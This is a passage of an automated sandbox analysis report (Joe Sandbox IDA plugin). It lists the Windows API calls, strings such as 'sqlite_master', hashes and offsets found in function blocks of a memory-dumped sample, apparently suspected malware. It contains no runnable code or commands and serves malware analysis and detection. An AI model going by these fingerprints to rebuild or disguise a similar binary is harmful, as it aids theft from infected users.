                                                                                                                                                              • API String ID: 3550944819-0
                                                                                                                                                              • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                              • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                              APIs
                                                                                                                                                              • free.MSVCRT ref: 0040F561
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$free
                                                                                                                                                              • String ID: g4@
                                                                                                                                                              • API String ID: 2888793982-2133833424
                                                                                                                                                              • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                              • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                              • memset.MSVCRT ref: 0040AF18
                                                                                                                                                              • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1865533344-0
                                                                                                                                                              • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                              • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004144E7
                                                                                                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                              • memset.MSVCRT ref: 0041451A
                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1127616056-0
                                                                                                                                                              • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                              • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                              • memset.MSVCRT ref: 0042FED3
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID: sqlite_master
                                                                                                                                                              • API String ID: 438689982-3163232059
                                                                                                                                                              • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                              • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                              APIs
                                                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3917621476-0
                                                                                                                                                              • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                              • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 822687973-0
                                                                                                                                                              • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                              • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                              APIs
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                              • malloc.MSVCRT ref: 00417459
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                              • free.MSVCRT ref: 0041747F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2605342592-0
                                                                                                                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                                                              • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2678498856-0
                                                                                                                                                              • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                              • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Item
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3888421826-0
                                                                                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3727323765-0
                                                                                                                                                              • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                              • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                              • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                                              • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                              • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                                              • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                              • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00402FD7
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                              • strlen.MSVCRT ref: 00403006
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                                              • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                              • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 764393265-0
                                                                                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                              APIs
                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
